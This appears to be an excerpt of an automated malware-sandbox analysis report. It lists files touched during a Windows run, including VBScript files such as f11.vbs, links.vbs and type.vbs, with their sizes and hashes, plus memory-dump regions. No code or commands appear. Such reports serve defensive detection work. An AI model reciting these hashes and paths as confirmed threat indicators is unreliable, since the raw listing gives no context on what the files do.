f5c318a108bd473001bff3b50e119236c35324234dcad42bbf5278c5de1a918e7253db3cca2649a99423fca31f445fc5b7c6bba1fdbb9775582550cd65939adf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\edgeSettings

Filesize
81B

MD5
f222079e71469c4d129b335b7c91355e

SHA1
0056c3003874efef229a5875742559c8c59887dc

SHA256
e713c1b13a849d759ebaa6256773f4f1d6dfc0c6a4247edaa726e0206ecacb00

SHA512
e5a49275e056b6628709cf6509a5f33f8d1d1e93125eaa6ec1c7f51be589fd3d8ea7a59b9639db586d76a994ad3dc452c7826e4ac0c8c689dd67ff90e33f0b75

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\edgeSettings_2.0-2f9188b68640dbf72295f9083a21d674a314721ef06f82db281cbcb052ff8ec1

Filesize
126KB

MD5
6698422bea0359f6d385a4d059c47301

SHA1
b1107d1f8cc1ef600531ed87cea1c41b7be474f6

SHA256
2f9188b68640dbf72295f9083a21d674a314721ef06f82db281cbcb052ff8ec1

SHA512
d0cdb3fa21e03f950dbe732832e0939a4c57edc3b82adb7a556ebd3a81d219431a440357654dfea94d415ba00fd7dcbd76f49287d85978d12c224cbfa8c1ad8d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\synchronousLookupUris

Filesize
40B

MD5
6a3a60a3f78299444aacaa89710a64b6

SHA1
2a052bf5cf54f980475085eef459d94c3ce5ef55

SHA256
61597278d681774efd8eb92f5836eb6362975a74cef807ce548e50a7ec38e11f

SHA512
c5d0419869a43d712b29a5a11dc590690b5876d1d95c1f1380c2f773ca0cb07b173474ee16fe66a6af633b04cc84e58924a62f00dcc171b2656d554864bf57a4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\synchronousLookupUris_638343870221005468

Filesize
57B

MD5
3a05eaea94307f8c57bac69c3df64e59

SHA1
9b852b902b72b9d5f7b9158e306e1a2c5f6112c8

SHA256
a8ef112df7dad4b09aaa48c3e53272a2eec139e86590fd80e2b7cbd23d14c09e

SHA512
6080aef2339031fafdcfb00d3179285e09b707a846fd2ea03921467df5930b3f9c629d37400d625a8571b900bc46021047770bac238f6bac544b48fb3d522fb0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\topTraffic

Filesize
29B

MD5
52e2839549e67ce774547c9f07740500

SHA1
b172e16d7756483df0ca0a8d4f7640dd5d557201

SHA256
f81b7b9ce24f5a2b94182e817037b5f1089dc764bc7e55a9b0a6227a7e121f32

SHA512
d80e7351e4d83463255c002d3fdce7e5274177c24c4c728d7b7932d0be3ebcfeb68e1e65697ed5e162e1b423bb8cdfa0864981c4b466d6ad8b5e724d84b4203b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\topTraffic_638004170464094982

Filesize
450KB

MD5
e9c502db957cdb977e7f5745b34c32e6

SHA1
dbd72b0d3f46fa35a9fe2527c25271aec08e3933

SHA256
5a6b49358772db0b5c682575f02e8630083568542b984d6d00727740506569d4

SHA512
b846e682427cf144a440619258f5aa5c94caee7612127a60e4bd3c712f8ff614da232d9a488e27fc2b0d53fd6acf05409958aea3b21ea2c1127821bd8e87a5ca

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{2F519BF2-C697-59F8-8F6A-1E19509CE66B}

Filesize
36KB

MD5
8aaad0f4eb7d3c65f81c6e6b496ba889

SHA1
231237a501b9433c292991e4ec200b25c1589050

SHA256
813c66ce7dec4cff9c55fb6f809eab909421e37f69ff30e4acaa502365a32bd1

SHA512
1a83ce732dc47853bf6e8f4249054f41b0dea8505cda73433b37dfa16114f27bfed3b4b3ba580aa9d53c3dcc8d48bf571a45f7c0468e6a0f2a227a7e59e17d62

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_charmap_exe

Filesize
36KB

MD5
406347732c383e23c3b1af590a47bccd

SHA1
fae764f62a396f2503dd81eefd3c7f06a5fb8e5f

SHA256
e0a9f5c75706dc79a44d0c890c841b2b0b25af4ee60d0a16a7356b067210038e

SHA512
18905eaad8184bb3a7b0fe21ff37ed2ee72a3bd24bb90cbfcad222cf09e2fa74e886d5c687b21d81cd3aec1e6c05891c24f67a8f82bafd2aceb0e0dcb7672ce7

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133768627053914362.txt

Filesize
82KB

MD5
ef1a6e7423a0afec9d7445c123335a1b

SHA1
47101c477234f6a4c2187794dcf60f7d359c7589

SHA256
1495d386d84fcd8f904cbbba54ec4cd7995a865467d4aca9313a42dec30cd04a

SHA512
6445b354f0d57c753a2751810ef84b060ed94d023395e3172bef47ae01b8e753df3dc2ccd42a4a8c5bdf0bfe7016fadcd0193bcfded08b582a5863561448501f

Download Submit
C:\Users\Admin\AppData\Local\Temp\f11.vbs

Filesize
75B

MD5
88588772a8ae25a467390f0c89b281e8

SHA1
3e0ecf4b0dee70b45f5090918ce3cfe63ddb8ef8

SHA256
40707b3bb21408fe71710b0ced97d3bee5deb4cb858b7167d28aeecbeefa47b4

SHA512
af0627292b040afee5da01e48cc979ae6df3afaf15bb27befd9978599c3345f3873f409224a0556e939661d3e37a1eafa9b6737afa00cfe5dc6e7a93a7dbc3bf

Download Submit
C:\Users\Admin\AppData\Local\Temp\f11.vbs

Filesize
47B

MD5
510673acb174f67a52d761324580a0d0

SHA1
d2b22130619f82d822777862336fb756bf77ffc7

SHA256
7dbdd9e6d5d34dc8766e7a3aa09260f3a3c20e65b45189d9d9de58bc92033e20

SHA512
85904f6e604a95016a2e787228d8a844e5192e7ed1bf2418e1f7d75822ac3e37d95d8eedb66f74c5930c726133971e2ffdb28151519a0a26592f1b46abebdb0f

Download Submit
C:\Users\Admin\AppData\Local\Temp\links.vbs

Filesize
1KB

MD5
dc9c3ac308a3cfbd8988083c62575b3c

SHA1
c7f4627e425afd6f0f5a69ba0da9433c8cffdb31

SHA256
e2432d38babdbfdae24b33c83af99082019fd559b28d9eb67a984a1308d8f63c

SHA512
3dfecaf15c816970ed0f88b1d27abdf7634cc0653538e3a44e19a0d715261ed55f5eec3e8b318f7c8a63022eda3686a038813860a4a2eeeb7cb971938fde8d8f

Download Submit
C:\type.vbs

Filesize
101B

MD5
f16fb6850c239ec1854cffc1ba29444f

SHA1
30fe6bbb61e779482041d37a9ee9a69cf9602154

SHA256
934c7158c85df97a1b7829fad5fbe67271d4345315f5a08c489725f7b592ac5c

SHA512
a4fe7cd2c11a90cb0b1d45c4d4b88e79601235ccac9913bc565550b9ab6dec30fc9908db3ffb4ba28a0d06064024d3deea67caa41ee53d1876a209893433bdf2

Download Submit
memory/4104-398-0x00000000047B0000-0x00000000047B1000-memory.dmp

Filesize
4KB

Download
memory/5788-433-0x00000216C2300000-0x00000216C2320000-memory.dmp

Filesize
128KB

Download
memory/5788-695-0x0000020EC0000000-0x0000020EC1930000-memory.dmp

Filesize
25.2MB

Download
memory/5788-417-0x00000216C19E0000-0x00000216C1A00000-memory.dmp

Filesize
128KB

Download
memory/5788-447-0x00000216D56F0000-0x00000216D57F0000-memory.dmp

Filesize
1024KB

Download
memory/5788-432-0x00000216C2320000-0x00000216C2340000-memory.dmp

Filesize
128KB

Download